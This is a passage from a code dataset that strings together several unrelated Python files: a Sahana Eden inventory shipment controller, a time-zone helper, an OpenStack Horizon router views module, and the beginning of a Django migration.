recv_id = rtable.insert(sender_id = send_record.sender_id,
send_ref = send_record.send_ref,
req_ref = send_record.req_ref,
from_site_id = send_record.site_id,
eta = send_record.delivery_date,
recipient_id = send_record.recipient_id,
site_id = send_record.to_site_id,
comments = send_record.comments,
status = eden.inv.inv_ship_status["SENT"],
type = 1, # 1:"Another Inventory"
)
# Change the status for all track items in this shipment to In transit
# and link to the receive record
db(tracktable.send_id == send_id).update(status = 2,
recv_id = recv_id)
session.confirmation = T("Shipment Items sent from Warehouse")
redirect(URL(c = "inv",
f = "send",
args = [send_id, "track_item"]))
# -----------------------------------------------------------------------------
def send_returns():
"""
This will cancel a shipment that has been sent
@todo need to roll back commitments
"""
send_id = request.args[0]
stable = s3db.inv_send
rtable = s3db.inv_recv
tracktable = s3db.inv_track_item
if not auth.s3_has_permission("update",
stable,
record_id=send_id):
session.error = T("You do not have permission to return this sent shipment.")
send_record = stable[send_id]
if send_record.status == eden.inv.inv_ship_status["IN_PROCESS"]:
session.error = T("This shipment has not been sent - it cannot be returned because it can still be edited.")
if session.error:
redirect(URL(c = "inv",
f = "send",
args = [send_id],
)
)
# Okay no error so far, change the status to Returning
stable[send_id] = dict(date = request.utcnow,
status = eden.inv.inv_ship_status["RETURNING"],
owned_by_user = None,
owned_by_group = ADMIN)
recv_row = db(tracktable.send_id == send_id).select(tracktable.recv_id,
limitby = (0, 1)).first()
if recv_row:
recv_id = recv_row.recv_id
rtable[recv_id] = dict(date = request.utcnow,
status = eden.inv.inv_ship_status["RETURNING"],
owned_by_user = None,
owned_by_group = ADMIN)
# Set all track items to status of returning
db(tracktable.send_id == send_id).update(status = eden.inv.inv_tracking_status["RETURNING"])
session.confirmation = T("Sent Shipment has returned, indicate how many items will be returned to Warehouse.")
redirect(URL(c = "inv",
f = "send",
args = [send_id, "track_item"]))
# -----------------------------------------------------------------------------
def return_process():
"""
Return some stock from a shipment back into the warehouse
"""
send_id = request.args[0]
invtable = s3db.inv_inv_item
stable = s3db.inv_send
rtable = s3db.inv_recv
tracktable = s3db.inv_track_item
if not auth.s3_has_permission("update",
stable,
record_id=send_id):
session.error = T("You do not have permission to return this sent shipment.")
send_record = stable[send_id]
if send_record.status != eden.inv.inv_ship_status["RETURNING"]:
session.error = T("This shipment has not been returned.")
if session.error:
redirect(URL(c = "inv",
f = "send",
args = [send_id],
)
)
# Okay no error so far, let's move the goods back into the warehouse
# and then change the status to received
# Update Receive record & lock for editing
# Move each item to the site
track_rows = db(tracktable.send_id == send_id).select()
for track_item in track_rows:
send_inv_id = track_item.send_inv_item_id
return_qnty = track_item.return_quantity
if return_qnty == None:
return_qnty = 0
# update the receive quantity in the tracking record
tracktable[track_item.id] = dict (recv_quantity = track_item.quantity - return_qnty)
if return_qnty:
db(invtable.id == send_inv_id).update(quantity = invtable.quantity + return_qnty)
stable[send_id] = dict(date = request.utcnow,
status = eden.inv.inv_ship_status["RECEIVED"],
owned_by_user = None,
owned_by_group = ADMIN)
recv_row = db(tracktable.send_id == send_id).select(tracktable.recv_id,
limitby = (0, 1)).first()
if recv_row:
recv_id = recv_row.recv_id
rtable[recv_id] = dict(date = request.utcnow,
status = eden.inv.inv_ship_status["RECEIVED"],
owned_by_user = None,
owned_by_group = ADMIN)
# Change the status for all track items in this shipment to Received
db(tracktable.send_id == send_id).update(status = eden.inv.inv_tracking_status["RECEIVED"])
redirect(URL(c = "inv",
f = "send",
args = [send_id]))
# -----------------------------------------------------------------------------
def send_cancel():
"""
This will cancel a shipment that has been sent
@todo need to roll back commitments
"""
send_id = request.args[0]
stable = s3db.inv_send
rtable = s3db.inv_recv
tracktable = s3db.inv_track_item
if not auth.s3_has_permission("delete",
stable,
record_id=send_id):
session.error = T("You do not have permission to cancel this sent shipment.")
send_record = stable[send_id]
if send_record.status != eden.inv.inv_ship_status["SENT"]:
session.error = T("This shipment has not been sent - it has NOT been canceled because can still be edited.")
if session.error:
redirect(URL(c = "inv",
f = "send",
args = [send_id],
)
)
# Okay no error so far, let's delete that baby
# Change the send and recv status to cancelled
stable[send_id] = dict(date = request.utcnow,
status = eden.inv.inv_ship_status["CANCEL"],
owned_by_user = None,
owned_by_group = ADMIN)
recv_row = db(tracktable.send_id == send_id).select(tracktable.recv_id,
limitby = (0, 1)).first()
if recv_row:
recv_id = recv_row.recv_id
rtable[recv_id] = dict(date = request.utcnow,
status = eden.inv.inv_ship_status["CANCEL"],
owned_by_user = None,
owned_by_group = ADMIN)
# Change the track items status to canceled and then delete them
# If they are linked to a request then the in transit total will also be reduced
# Records can only be deleted if the status is In Process (or preparing)
# so change the status before we delete
db(tracktable.send_id == send_id).update(status = eden.inv.inv_tracking_status["IN_PROCESS"])
track_rows = db(tracktable.send_id == send_id).select(tracktable.id)
for track_item in track_rows:
s3.inv_track_item_deleting(track_item.id)
# Now change the status to (cancelled)
db(tracktable.send_id == send_id).update(status = eden.inv.inv_tracking_status["CANCEL"])
session.confirmation = T("Sent Shipment canceled and items returned to Warehouse")
redirect(URL(c = "inv",
f = "send",
args = [send_id]))
# =============================================================================
def recv():
""" RESTful CRUD controller """
recvtable = s3db.inv_recv
tracktable = s3db.inv_track_item
atable = s3db.inv_adj_item
# Limit site_id to sites the user has permissions for
if settings.get_inv_shipment_name() == "order":
error_msg = T("You do not have permission for any facility to add an order.")
else:
error_msg = T("You do not have permission for any facility to receive a shipment.")
auth.permitted_facilities(table=recvtable, error_msg=error_msg)
# The inv_recv record might be created when the shipment is send and so it
# might not have the recipient identified. If it is null then set it to
# the person who is logged in (the default)
id = request.args(0)
if id:
try:
if recvtable[id].recipient_id == None:
db(recvtable.id == id).update(recipient_id = auth.s3_logged_in_person())
except:
pass
status = s3db.inv_ship_status
SHIP_STATUS_IN_PROCESS = status["IN_PROCESS"]
SHIP_STATUS_SENT = status["SENT"]
SHIP_STATUS_RECEIVED = status["RECEIVED"]
SHIP_STATUS_CANCEL = status["CANCEL"]
def set_recv_attr(status):
recvtable.sender_id.readable = False
recvtable.sender_id.writable = False
recvtable.grn_status.readable = False
recvtable.grn_status.writable = False
recvtable.cert_status.readable = False
recvtable.cert_status.writable = False
recvtable.eta.readable = False
recvtable.req_ref.writable = True
if status == SHIP_STATUS_IN_PROCESS:
recvtable.send_ref.writable = True
recvtable.recv_ref.readable = False
recvtable.sender_id.readable = False
else:
# Make all fields writable False
for field in recvtable.fields:
recvtable[field].writable = False
if status == SHIP_STATUS_SENT:
recvtable.recipient_id.readable = True
recvtable.recipient_id.writable = True
recvtable.comments.writable = True
status = s3db.inv_tracking_status
TRACK_STATUS_UNKNOWN = status["UNKNOWN"]
TRACK_STATUS_PREPARING = status["IN_PROCESS"]
TRACK_STATUS_TRANSIT = status["SENT"]
TRACK_STATUS_UNLOADING = status["UNLOADING"]
TRACK_STATUS_ARRIVED = status["RECEIVED"]
TRACK_STATUS_CANCELED = status["CANCEL"]
def set_track_attr(status):
# By default Make all fields writable False
for field in tracktable.fields:
tracktable[field].writable = False
# Hide some fields
tracktable.send_id.readable = False
tracktable.recv_id.readable = False
tracktable.bin.readable = False
tracktable.adj_item_id.readable = False
tracktable.recv_quantity.readable = True
if status == TRACK_STATUS_PREPARING:
# show some fields
tracktable.item_source_no.writable = True
tracktable.item_id.writable = True
tracktable.item_pack_id.writable = True
tracktable.quantity.writable = True
tracktable.currency.writable = True
tracktable.pack_value.writable = True
tracktable.expiry_date.writable = True
tracktable.recv_bin.writable = True
tracktable.owner_org_id.writable = True
tracktable.supply_org_id.writable = True
tracktable.inv_item_status.writable = True
tracktable.comments.writable = True
tracktable.recv_quantity.readable = False
# hide some fields
tracktable.send_inv_item_id.readable = False
# change some labels - NO - use consistent labels
#tracktable.quantity.label = T("Quantity Delivered")
tracktable.recv_bin.label = T("Bin")
elif status == TRACK_STATUS_TRANSIT:
# Hide the values that will be copied from the inv_inv_item record
tracktable.send_inv_item_id.readable = False
tracktable.send_inv_item_id.writable = False
tracktable.item_source_no.readable = True
tracktable.item_source_no.writable = False
# Display the values that can only be entered on create
tracktable.recv_quantity.writable = True
tracktable.recv_bin.readable = True
tracktable.recv_bin.writable = True
tracktable.comments.writable = True
# This is a received purchase so change the label to reflect this - NO - use consistent labels
#tracktable.quantity.label = T("Quantity Delivered")
elif status == TRACK_STATUS_ARRIVED:
tracktable.item_source_no.readable = True
tracktable.item_source_no.writable = False
tracktable.item_id.writable = False
tracktable.send_inv_item_id.writable = False
tracktable.item_pack_id.writable = False
tracktable.quantity.writable = False
tracktable.currency.writable = False
tracktable.pack_value.writable = False
tracktable.expiry_date.writable = False
tracktable.owner_org_id.writable = False
tracktable.supply_org_id.writable = False
tracktable.recv_bin.readable = True
tracktable.recv_bin.writable = True
def prep(r):
record = recvtable[r.id]
if (record and
(record.status != SHIP_STATUS_IN_PROCESS and
record.status != SHIP_STATUS_SENT)):
# now that the shipment has been sent
# lock the record so that it can't be meddled with
s3db.configure("inv_recv",
create=False,
listadd=False,
editable=False,
deletable=False,
)
if r.component:
# Set the track_item attributes
# Can only create or delete track items for a recv record if the status is preparing
if r.method == "create" or r.method == "delete":
if record.status != SHIP_STATUS_IN_PROCESS:
return False
if r.component_id:
track_record = tracktable[r.component_id]
set_track_attr(track_record.status)
else:
set_track_attr(TRACK_STATUS_PREPARING)
tracktable.status.readable = False
if r.record and r.record.status == SHIP_STATUS_IN_PROCESS:
s3.crud_strings.inv_recv.title_update = \
s3.crud_strings.inv_recv.title_display = T("Process Received Shipment")
else:
# Set the recv attributes
if r.id:
record = recvtable[r.id]
set_recv_attr(record.status)
else:
set_recv_attr(SHIP_STATUS_IN_PROCESS)
recvtable.recv_ref.readable = False
if r.method and r.method != "read":
# Don't want to see in Create forms
recvtable.status.readable = False
return True
s3.prep = prep
if len(request.args) > 1 and request.args[1] == "track_item":
status = recvtable[request.args[0]].status
if status == SHIP_STATUS_SENT:
list_fields = ["id",
"status",
"item_id",
"item_pack_id",
"quantity",
"currency",
"pack_value",
"recv_quantity",
"recv_bin",
"owner_org_id",
"supply_org_id",
]
s3db.configure("inv_track_item",
list_fields=list_fields,
)
if status:
# remove CRUD generated buttons in the tabs
s3db.configure("inv_track_item",
create=False,
listadd=False,
editable=False,
deletable=False,
)
if recvtable[request.args[0]].status == 2:
s3db.configure("inv_track_item",
editable=True,
)
output = s3_rest_controller(rheader=s3db.inv_recv_rheader)
return output
# -----------------------------------------------------------------------------
def req_items_for_inv(site_id, quantity_type):
"""
used by recv_process & send_process
returns a dict of unique req items (with min db.req_req.date_required | db.req_req.date)
key = item_id
@param site_id: The inventory to find the req_items from
@param quantity_type: str ("commit", "transit" or "fulfil) The
quantity type which will be used to determine if this item is still outstanding
"""
if not settings.has_module("req"):
return Storage()
table = s3db.req_req
itable = s3db.req_req_item
query = (table.site_id == site_id) & \
(table.id == itable.req_id) & \
(itable.item_pack_id == itable.item_pack_id) & \
(itable["quantity_%s" % quantity_type] < itable.quantity) & \
(table.cancel == False) & \
(table.deleted == False) & \
(itable.deleted == False)
req_items = db(query).select(itable.id,
itable.req_id,
itable.item_id,
itable.quantity,
itable["quantity_%s" % quantity_type],
itable.item_pack_id,
orderby = table.date_required | table.date,
#groupby = itable.item_id
)
# Because groupby doesn't follow the orderby, this will remove any
# duplicate req_item, using the first record according to the orderby
# req_items = req_items.as_dict( key = "req_req_item.item_id") <- doensn't work
# @todo: web2py Rows.as_dict function could be extended to enable this functionality instead
req_item_ids = []
unique_req_items = Storage()
for req_item in req_items:
if req_item.item_id not in req_item_ids:
# This item is not already in the dict
unique_req_items[req_item.item_id] = Storage( req_item.as_dict() )
req_item_ids.append(req_item.item_id)
return unique_req_items
# -----------------------------------------------------------------------------
def req_item_in_shipment( shipment_item,
shipment_type,
req_items,
):
"""
Checks if a shipment item is in a request and updates req_item
and the shipment.
"""
shipment_item_table = "inv_%s_item" % shipment_type
try:
item_id = shipment_item[shipment_item_table].item_id
except:
item_id = shipment_item.inv_inv_item.item_id
# Check for req_items
if item_id in req_items:
shipment_to_req_type = dict(recv = "fulfil",
send = "transit")
quantity_req_type = "quantity_%s" % shipment_to_req_type[shipment_type]
# This item has been requested from this inv
req_item = req_items[item_id]
req_item_id = req_item.id
# Update the req quantity
# convert the shipment items quantity into the req_tem.quantity_fulfil (according to pack)
quantity = req_item[quantity_req_type] + \
(shipment_item[shipment_item_table].pack_quantity / \
req_item.pack_quantity) * \
shipment_item[shipment_item_table].quantity
quantity = min(quantity, req_item.quantity) #Cap at req. quantity
s3db.req_req_item[req_item_id] = {quantity_req_type: quantity}
# Link the shipment_item to the req_item
s3db[shipment_item_table][shipment_item[shipment_item_table].id] = \
dict(req_item_id = req_item_id)
# Flag req record to update status_fulfil
return req_item.req_id, req_item.id
else:
return None, None
# -----------------------------------------------------------------------------
def recv_process():
""" Receive a Shipment """
try:
recv_id = request.args[0]
except:
redirect(URL(f="recv"))
atable = s3db.inv_adj
rtable = s3db.inv_recv
stable = s3db.inv_send
tracktable = s3db.inv_track_item
siptable = s3db.supply_item_pack
rrtable = s3db.req_req
ritable = s3db.req_req_item
if not auth.s3_has_permission("update",
rtable,
record_id=recv_id):
session.error = T("You do not have permission to receive this shipment.")
recv_record = rtable[recv_id]
if recv_record.status == eden.inv.SHIP_STATUS_RECEIVED:
session.error = T("This shipment has already been received.")
if recv_record.status == eden.inv.SHIP_STATUS_CANCEL:
session.error = T("This shipment has already been received & subsequently canceled.")
if session.error:
redirect(URL(c = "inv",
f = "recv",
args = [recv_id]))
site_id = recv_record.site_id
# Update Receive record & lock for editing
code = s3db.inv_get_shipping_code(settings.get_inv_recv_shortname(),
recv_record.site_id,
s3db.inv_recv.recv_ref)
rtable[recv_id] = dict(date = request.utcnow,
recv_ref = code,
status = eden.inv.inv_ship_status["RECEIVED"],
owned_by_user = None,
owned_by_group = ADMIN)
send_row = db(tracktable.recv_id == recv_id).select(tracktable.send_id,
limitby=(0, 1)).first()
if send_row:
send_id = send_row.send_id
stable[send_id] = dict(date = request.utcnow,
status = eden.inv.inv_ship_status["RECEIVED"],
owned_by_user = None,
owned_by_group = ADMIN)
# Change the status for all track items in this shipment to Unloading
# the onaccept will then move the values into the site update any request
# record, create any adjustment if needed and change the status to Arrived
db(tracktable.recv_id == recv_id).update(status = 3)
# Move each item to the site
track_rows = db(tracktable.recv_id == recv_id).select()
for track_item in track_rows:
row=Storage(track_item)
s3.inv_track_item_onaccept(Storage(vars=Storage(id=row.id),
record = row,
)
)
session.confirmation = T("Shipment Items Received")
redirect(URL(c = "inv",
f = "recv",
args = [recv_id]))
# -----------------------------------------------------------------------------
def recv_cancel():
"""
Cancel a Received Shipment
@todo what to do if the quantity cancelled doesn't exist?
"""
try:
recv_id = request.args[0]
except:
redirect(URL(f="recv"))
rtable = s3db.inv_recv
stable = s3db.inv_send
tracktable = s3db.inv_track_item
inv_item_table = s3db.inv_inv_item
ritable = s3db.req_req_item
siptable = s3db.supply_item_pack
if not auth.s3_has_permission("delete",
rtable,
record_id=recv_id):
session.error = T("You do not have permission to cancel this received shipment.")
recv_record = rtable[recv_id]
if recv_record.status != eden.inv.inv_ship_status["RECEIVED"]:
session.error = T("This shipment has not been received - it has NOT been canceled because can still be edited.")
if session.error:
redirect(URL(c = "inv",
f = "recv",
args = [recv_id]))
# Go through each item in the shipment remove them from the site store
# and put them back in the track item record
query = (tracktable.recv_id == recv_id) & \
(tracktable.deleted == False)
recv_items = db(query).select()
send_id = None
for recv_item in recv_items:
inv_item_id = recv_item.recv_inv_item_id
# This assumes that the inv_item has the quantity
quantity = inv_item_table.quantity - recv_item.recv_quantity
db(inv_item_table.id == inv_item_id).update(quantity = quantity)
db(tracktable.recv_id == recv_id).update(status = 2) # In transit
# @todo potential problem in that the send id should be the same for all track items but is not explicitly checked
if send_id == None and recv_item.send_id != None:
send_id = recv_item.send_id
track_rows = db(tracktable.recv_id == recv_id).select()
for track_item in track_rows:
# if this is linked to a request
# then remove these items from the quantity in fulfil
if track_item.req_item_id:
req_id = track_item.req_item_id
req_item = ritable[req_id]
req_quantity = req_item.quantity_fulfil
req_pack_quantity = siptable[req_item.item_pack_id].quantity
track_pack_quantity = siptable[track_item.item_pack_id].quantity
quantity_fulfil = s3db.supply_item_add(req_quantity,
req_pack_quantity,
- track_item.recv_quantity,
track_pack_quantity
)
db(ritable.id == req_id).update(quantity_fulfil = quantity_fulfil)
s3db.req_update_status(req_id)
# Now set the recv record to cancelled and the send record to sent
rtable[recv_id] = dict(date = request.utcnow,
status = eden.inv.inv_ship_status["CANCEL"],
owned_by_user = None,
owned_by_group = ADMIN)
if send_id != None:
# The sent record is now set back to SENT the warehouse can now cancel
# this record to get the stock back into their warehouse.
# IMPORTANT reports need to locate this record otherwise it can be
# a mechanism to circumvent the auditing of stock
stable[send_id] = dict(date = request.utcnow,
status = eden.inv.inv_ship_status["SENT"],
owned_by_user = None,
owned_by_group = ADMIN)
redirect(URL(c = "inv",
f = "recv",
args = [recv_id]))
# =============================================================================
def track_item():
""" RESTful CRUD controller """
table = s3db.inv_track_item
s3db.configure("inv_track_item",
create=False,
listadd=False,
insertable=False,
editable=False,
deletable=False,
)
vars = request.get_vars
if "report" in vars:
if vars.report == "rel":
s3.crud_strings["inv_track_item"] = Storage(
title_list = T("Summary of Releases"),
subtitle_list = T("Summary Details"),
title_search = T("Summary of Releases"),
)
s3db.configure("inv_track_item",
list_fields = ["id",
#"send_id",
#"req_item_id",
(T("Date Released"), "send_id$date"),
(T("Beneficiary"), "send_id$site_id"),
(settings.get_inv_send_shortname(), "send_id$send_ref"),
(settings.get_req_shortname(), "send_id$req_ref"),
(T("Items/Description"), "item_id"),
(T("Source"), "supply_org_id"),
(T("Unit"), "item_pack_id"),
(T("Quantity"), "quantity"),
(T("Unit Cost"), "pack_value"),
(T("Total Cost"), "total_value"),
],
orderby = "site_id",
sort = True
)
s3.filter = (table.send_id != None)
elif vars.report == "inc":
s3.crud_strings["inv_track_item"] = Storage(
title_list = T("Summary of Incoming Supplies"),
subtitle_list = T("Summary Details"),
title_search = T("Summary of Incoming Supplies"),
)
s3db.configure("inv_track_item",
list_fields = ["id",
(T("Date Received"), "recv_id$date"),
(T("Received By"), "recv_id$recipient_id"),
(settings.get_inv_send_shortname(), "recv_id$send_ref"),
(settings.get_inv_recv_shortname(), "recv_id$recv_ref"),
(settings.get_proc_shortname(), "recv_id$purchase_ref"),
(T("Item/Description"), "item_id"),
(T("Unit"), "item_pack_id"),
(T("Quantity"), "quantity"),
(T("Unit Cost"), "pack_value"),
(T("Total Cost"), "total_value"),
(T("Source"), "supply_org_id"),
(T("Remarks"), "comments"),
],
orderby = "recipient_id",
)
s3.filter = (table.recv_id != None)
elif vars.report == "util":
s3.crud_strings["inv_track_item"] = Storage(
title_list = T("Utilization Report"),
subtitle_list = T("Utilization Details"),
title_search = T("Utilization Report"),
)
s3db.configure("inv_track_item",
list_fields = ["id",
(T("Item/Description"), "item_id$name"),
(T("Beneficiary"), "send_id$site_id"),
(settings.get_inv_send_shortname(), "send_id$send_ref"),
(settings.get_req_shortname(), "send_id$req_ref"),
(T("Items/Description"), "item_id"),
(T("Source"), "supply_org_id"),
(T("Unit"), "item_pack_id"),
(T("Quantity"), "quantity"),
(T("Unit Cost"), "pack_value"),
(T("Total Cost"), "total_value"),
]
)
s3.filter = (table.item_id != None)
elif vars.report == "exp":
s3.crud_strings["inv_track_item"] = Storage(
title_list = T("Expiration Report"),
subtitle_list = T("Expiration Details"),
title_search = T("Expiration Report"),
)
s3db.configure("inv_track_item",
list_fields = ["id",
(T("Item/Description"), "item_id"),
(T("Expiration Date"), "expiry_date"),
(T("Source"), "supply_org_id"),
(T("Unit"), "item_pack_id"),
(T("Quantity"), "quantity"),
(T("Unit Cost"), "pack_value"),
(T("Total Cost"), "total_value"),
]
)
s3.filter = (table.expiry_date != None)
output = s3_rest_controller(rheader=s3db.inv_warehouse_rheader)
return output
# =============================================================================
def adj():
""" RESTful CRUD controller """
table = s3db.inv_adj
# Limit site_id to sites the user has permissions for
error_msg = T("You do not have permission to adjust the stock level in this warehouse.")
auth.permitted_facilities(table=table, error_msg=error_msg)
def prep(r):
if r.interactive:
if r.component:
if r.component_id:
aitable = s3db.inv_adj_item
if r.record.status == 0:
aitable.reason.writable = True
record = aitable[r.component_id]
if record.inv_item_id:
aitable.item_id.writable = False
aitable.item_id.comment = None
aitable.item_pack_id.writable = False
else:
# if an adjustment has been selected and it has been completed
# then make the fields read only
if r.record and r.record.status:
table.adjuster_id.writable = False
table.site_id.writable = False
table.comments.writable = False
else:
if "item" in request.vars and "site" in request.vars:
# create a adj record with a single adj_item record
adj_id = table.insert(adjuster_id = auth.s3_logged_in_person(),
site_id = request.vars.site,
adjustment_date = request.utcnow,
status = 0,
category = 1,
comments = "Single item adjustment"
)
inv_item_table = s3db.inv_inv_item
inv_item = inv_item_table[request.vars.item]
adjitemtable = s3db.inv_adj_item
adj_item_id = adjitemtable.insert(reason = 0,
adj_id = adj_id,
inv_item_id = inv_item.id, # original source inv_item
item_id = inv_item.item_id, # the supply item
item_pack_id = inv_item.item_pack_id,
old_quantity = inv_item.quantity,
currency = inv_item.currency,
old_status = inv_item.status,
new_status = inv_item.status,
old_pack_value = inv_item.pack_value,
new_pack_value = inv_item.pack_value,
expiry_date = inv_item.expiry_date,
bin = inv_item.bin,
old_owner_org_id = inv_item.owner_org_id,
new_owner_org_id = inv_item.owner_org_id,
)
redirect(URL(c = "inv",
f = "adj",
args = [adj_id,
"adj_item",
adj_item_id,
"update"]))
else:
table.comments.default = "Complete Stock Adjustment"
if "site" in request.vars:
table.site_id.writable = True
table.site_id.default = request.vars.site
return True
s3.prep = prep
def postp(r, output):
if r.interactive:
s3_action_buttons(r, deletable=False)
return output
s3.postp = postp
if len(request.args) > 1 and request.args[1] == "adj_item" and table[request.args[0]].status:
# remove CRUD generated buttons in the tabs
s3db.configure("inv_adj_item",
create=False,
listadd=False,
editable=False,
deletable=False,
)
output = s3_rest_controller(rheader=s3db.inv_adj_rheader)
return output
# -----------------------------------------------------------------------------
def adj_close():
""" RESTful CRUD controller """
try:
adj_id = request.args[0]
except:
redirect(URL(f="adj"))
atable = s3db.inv_adj
aitable = s3db.inv_adj_item
inv_item_table = s3db.inv_inv_item
# Limit site_id to sites the user has permissions for
error_msg = T("You do not have permission to adjust the stock level in this warehouse.")
auth.permitted_facilities(table=atable, error_msg=error_msg)
adj_rec = atable[adj_id]
if adj_rec.status != 0:
session.error = T("This adjustment has already been closed.")
if session.error:
redirect(URL(c = "inv",
f = "adj",
args = [adj_id]))
# Go through all the adj_items
query = (aitable.adj_id == adj_id) & \
(aitable.deleted == False)
adj_items = db(query).select()
for adj_item in adj_items:
if adj_item.inv_item_id == None:
# Create a new stock item
inv_item_id = inv_item_table.insert(site_id = adj_rec.site_id,
item_id = adj_item.item_id,
item_pack_id = adj_item.item_pack_id,
currency = adj_item.currency,
bin = adj_item.bin,
pack_value = adj_item.old_pack_value,
expiry_date = adj_item.expiry_date,
quantity = adj_item.new_quantity,
owner_org_id = adj_item.old_owner_org_id,
)
# Add the inventory item id to the adjustment record
db(aitable.id == adj_item.id).update(inv_item_id = inv_item_id)
elif adj_item.new_quantity is not None:
# Update the existing stock item
db(inv_item_table.id == adj_item.inv_item_id).update(item_pack_id = adj_item.item_pack_id,
bin = adj_item.bin,
pack_value = adj_item.old_pack_value,
expiry_date = adj_item.expiry_date,
quantity = adj_item.new_quantity,
owner_org_id = adj_item.new_owner_org_id,
status = adj_item.new_status,
)
# Change the status of the adj record to Complete
db(atable.id == adj_id).update(status=1)
# Go to the Inventory of the Site which has adjusted these items
(prefix, resourcename, id) = s3db.get_instance(s3db.org_site,
adj_rec.site_id)
url = URL(c = prefix,
f = resourcename,
args = [id, "inv_item"])
redirect(url)
# =============================================================================
def recv_item_json():
"""
"""
stable = s3db.org_site
rtable = s3db.inv_recv
ittable = s3db.inv_track_item
rtable.date.represent = lambda dt: dt[:10]
query = (ittable.req_item_id == request.args[0]) & \
(rtable.id == ittable.recv_id) & \
(rtable.site_id == stable.id) & \
(rtable.status == eden.inv.inv_ship_status["RECEIVED"]) & \
(ittable.deleted == False )
records = db(query).select(rtable.id,
rtable.date,
stable.name,
ittable.quantity)
json_str = "[%s,%s" % ( json.dumps(dict(id = str(T("Received")),
quantity = "#"
)) ,
records.json()[1:])
response.headers["Content-Type"] = "application/json"
return json_str
# -----------------------------------------------------------------------------
def send_item_json():
"""
"""
stable = s3db.org_site
istable = s3db.inv_send
ittable = s3db.inv_track_item
istable.date.represent = lambda dt: dt[:10]
query = (ittable.req_item_id == request.args[0]) & \
(istable.id == ittable.send_id) & \
(istable.site_id == stable.id) & \
((istable.status == eden.inv.inv_ship_status["SENT"]) | \
(istable.status == eden.inv.inv_ship_status["RECEIVED"])) & \
(ittable.deleted == False)
records = db(query).select(istable.id,
istable.date,
stable.name,
ittable.quantity)
json_str = "[%s,%s" % ( json.dumps(dict(id = str(T("Sent")),
quantity = "#"
)) ,
records.json()[1:])
response.headers["Content-Type"] = "application/json"
return json_str
# -----------------------------------------------------------------------------
def kit():
return s3_rest_controller()
# -----------------------------------------------------------------------------
def facility():
return s3_rest_controller("org", rheader = s3db.org_facility_rheader)
# -----------------------------------------------------------------------------
def incoming():
""" Incoming Shipments """
# Defined in the Model for use from Multiple Controllers for unified menus
return inv_incoming()
# -----------------------------------------------------------------------------
def req_match():
""" Match Requests """
return s3db.req_match()
# END =========================================================================
| ashwyn/eden-message_parser | controllers/inv.py | Python | mit | 72,247 |
from datetime import datetime
from pytz import timezone
FORMAT = "%Y-%m-%d %H%M"
TIME_ZONE = 'Europe/Paris'
def current_time_zone_info():
current_time = datetime.now(timezone(TIME_ZONE)).strftime(FORMAT)
return current_time.split()
| wearhacks/hackathon_hotline | hotline/common/time_zone.py | Python | mit | 242 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012, Nachi Ueno, NTT MCL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Views for managing Neutron Routers.
"""
import logging
from django.core.urlresolvers import reverse_lazy
from django.utils.datastructures import SortedDict
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import tables
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.routers.forms import CreateForm
from openstack_dashboard.dashboards.project.routers.ports.tables \
import PortsTable
from openstack_dashboard.dashboards.project.routers.tables import RoutersTable
LOG = logging.getLogger(__name__)
class IndexView(tables.DataTableView):
table_class = RoutersTable
template_name = 'project/routers/index.html'
def _get_routers(self, search_opts=None):
try:
tenant_id = self.request.user.tenant_id
routers = api.neutron.router_list(self.request,
tenant_id=tenant_id,
search_opts=search_opts)
except:
routers = []
exceptions.handle(self.request,
_('Unable to retrieve router list.'))
ext_net_dict = self._list_external_networks()
for r in routers:
r.set_id_as_name_if_empty()
self._set_external_network(r, ext_net_dict)
return routers
def get_data(self):
routers = self._get_routers()
return routers
def _list_external_networks(self):
try:
search_opts = {'router:external': True}
ext_nets = api.neutron.network_list(self.request,
**search_opts)
for ext_net in ext_nets:
ext_net.set_id_as_name_if_empty()
ext_net_dict = SortedDict((n['id'], n.name) for n in ext_nets)
except Exception as e:
msg = _('Unable to retrieve a list of external networks "%s".') % e
exceptions.handle(self.request, msg)
ext_net_dict = {}
return ext_net_dict
def _set_external_network(self, router, ext_net_dict):
gateway_info = router.external_gateway_info
if gateway_info:
ext_net_id = gateway_info['network_id']
if ext_net_id in ext_net_dict:
gateway_info['network'] = ext_net_dict[ext_net_id]
else:
msg = _('External network "%s" not found.') % (ext_net_id)
exceptions.handle(self.request, msg)
class DetailView(tables.MultiTableView):
table_classes = (PortsTable, )
template_name = 'project/routers/detail.html'
failure_url = reverse_lazy('horizon:project:routers:index')
def _get_data(self):
if not hasattr(self, "_router"):
try:
router_id = self.kwargs['router_id']
router = api.neutron.router_get(self.request, router_id)
router.set_id_as_name_if_empty(length=0)
except:
msg = _('Unable to retrieve details for router "%s".') \
% (router_id)
exceptions.handle(self.request, msg, redirect=self.failure_url)
if router.external_gateway_info:
ext_net_id = router.external_gateway_info['network_id']
try:
ext_net = api.neutron.network_get(self.request, ext_net_id,
expand_subnet=False)
ext_net.set_id_as_name_if_empty(length=0)
router.external_gateway_info['network'] = ext_net.name
except Exception:
msg = _('Unable to retrieve an external network "%s".') \
% (ext_net_id)
exceptions.handle(self.request, msg)
router.external_gateway_info['network'] = ext_net_id
self._router = router
return self._router
def get_context_data(self, **kwargs):
context = super(DetailView, self).get_context_data(**kwargs)
context["router"] = self._get_data()
return context
def get_interfaces_data(self):
try:
device_id = self.kwargs['router_id']
ports = api.neutron.port_list(self.request,
device_id=device_id)
except:
ports = []
msg = _('Port list can not be retrieved.')
exceptions.handle(self.request, msg)
for p in ports:
p.set_id_as_name_if_empty()
return ports
class CreateView(forms.ModalFormView):
form_class = CreateForm
template_name = 'project/routers/create.html'
success_url = reverse_lazy("horizon:project:routers:index")
| tuskar/tuskar-ui | openstack_dashboard/dashboards/project/routers/views.py | Python | apache-2.0 | 5,466 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-22 23:51
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('cs_questions', '0010_auto_20160522_2041'),
]
operations = [
migrations.AlterModelOptions(
name='quizactivity',
